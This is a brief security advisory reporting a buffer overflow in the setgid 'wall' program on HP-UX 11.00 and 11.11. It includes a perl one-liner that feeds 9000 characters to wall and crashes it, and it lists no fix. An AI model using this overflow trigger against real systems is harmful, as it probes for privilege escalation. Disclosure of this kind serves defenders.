COMMAND

	Wall Buffer Overflow

SYSTEMS AFFECTED

	Tested on HPUX 11.00,11.11

PROBLEM

	eip,c0w of uk2sec [uk2sec@oakey.no-ip.com] says :
	
	
	bash-2.04$ ls -las /usr/sbin/wall  
	  40 -r-xr-sr-x   1 bin        tty          20480 Nov  7  1997 
	/usr/sbin/wall
	
	Wall on HPUX works in the following way:
	
	echo "Something to Say" > file
	wall file
	
	The problem arises when we place 9000 A's into the file to be  broadcast
	by the wall program.
	
	 Example :
	 =========
	
	perl -e 'print "A" x 9000' > /tmp/out
	/usr/sbin/wall /tmp/out
	Memory fault
	
	The wall binary has Set Group ID of tty, so  not  a  huge  problem,  but
	even so - still a security risk.

SOLUTION

	?